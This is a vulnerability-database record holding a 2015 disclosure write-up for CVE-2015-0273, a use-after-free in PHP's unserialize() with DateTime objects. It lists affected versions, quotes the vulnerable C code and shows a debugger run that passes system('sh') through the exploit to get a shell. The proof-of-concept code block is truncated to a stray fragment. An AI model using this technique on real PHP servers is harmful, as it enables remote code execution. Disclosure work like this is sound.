{"uuid": "4a851e87-8da7-470d-a408-eaa7b348032a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2015-0273", "type": "seen", "source": "https://gist.github.com/infernalheaven/1512d272a18678d67abd80c1781537fd", "content": "# Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]\n\nTaoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.1.29 - Release Date: 2015.2.20\n\n> A use-after-free vulnerability was discovered in unserialize() with the DateTime/DateTimeZone objects' __wakeup() magic method, which can be abused to leak arbitrary memory blocks or execute arbitrary code remotely.\n\nAffected Versions\n------------\nAffected is PHP 5.6 < 5.6.6  \nAffected is PHP 5.5 < 5.5.22  \nAffected is PHP 5.4 < 5.4.38  \nAffected is PHP 5.3 <= 5.3.29\n\nCredits\n------------\nThis vulnerability was disclosed by Taoguang Chen.\n\nDescription\n------------\n\n```\nstatic int php_date_initialize_from_hash(php_date_obj **dateobj, HashTable *myht)\n{\n\tzval             *z_date;\n\tzval             *z_timezone;\n\tzval             *z_timezone_type;\n\tzval              tmp_obj;\n\ttimelib_tzinfo   *tzi;\n\tphp_timezone_obj *tzobj;\n\n\tz_date = zend_hash_str_find(myht, \"date\", sizeof(\"data\")-1);\n\tif (z_date) {\n\t\tconvert_to_string(z_date);\n\t\tz_timezone_type = zend_hash_str_find(myht, \"timezone_type\", sizeof(\"timezone_type\")-1);\n\t\tif (z_timezone_type) {\n\t\t\tconvert_to_long(z_timezone_type);\n\t\t\tz_timezone = zend_hash_str_find(myht, \"timezone\", sizeof(\"timezone\")-1);\n\t\t\tif (z_timezone) {\n\t\t\t\tconvert_to_string(z_timezone);\n\n...\n\nstatic int php_date_timezone_initialize_from_hash(zval **return_value, php_timezone_obj **tzobj, HashTable *myht TSRMLS_DC)\n{\n\tzval            **z_timezone = NULL;\n\tzval            **z_timezone_type = NULL;\n\n\tif (zend_hash_find(myht, \"timezone_type\", 14, (void**) &z_timezone_type) == SUCCESS) {\n\t\tif (zend_hash_find(myht, \"timezone\", 9, (void**) &z_timezone) == SUCCESS) {\n\t\t\tconvert_to_long(*z_timezone_type);\n\t\t\tif (SUCCESS == timezone_initialize(*tzobj, Z_STRVAL_PP(z_timezone) TSRMLS_CC)) {\n\t\t\t\treturn SUCCESS;\n\t\t\t}\n\t\t}\n\t}\n\treturn FAILURE;\n}\n```\n\nThe convert_to_long() call causes the ZVAL and all its children to be freed from memory. However, the unserialize() code still allows R: or r: to set references to that already freed memory. This is a use-after-free vulnerability, and it allows arbitrary code execution.\n\nProof of Concept Exploit\n------------\nThe PoC works on a standard MacOSX 10.10.2 installation of PHP 5.5.14.\n\n```\n>= 8;\n\t}\n\treturn $out;\n}\n\n?>\n```\n\nRun the PoC on the command line; any PHP code can then be executed:\n\n```\n$ lldb php\n(lldb) target create \"php\"\nCurrent executable set to 'php' (x86_64).\n(lldb) run uafpoc.php assert \"system\\('sh'\\)==exit\\(\\)\"\nProcess 13472 launched: '/usr/bin/php' (x86_64)\nsh: no job control in this shell\nsh-3.2$ php -v\nPHP 5.5.14 (cli) (built: Sep  9 2014 19:09:25) \nCopyright (c) 1997-2014 The PHP Group\nZend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies\nsh-3.2$ exit\nexit\nProcess 13472 exited with status = 0 (0x00000000) \n(lldb) \n```", "creation_timestamp": "2026-05-08T22:10:30.000000Z"}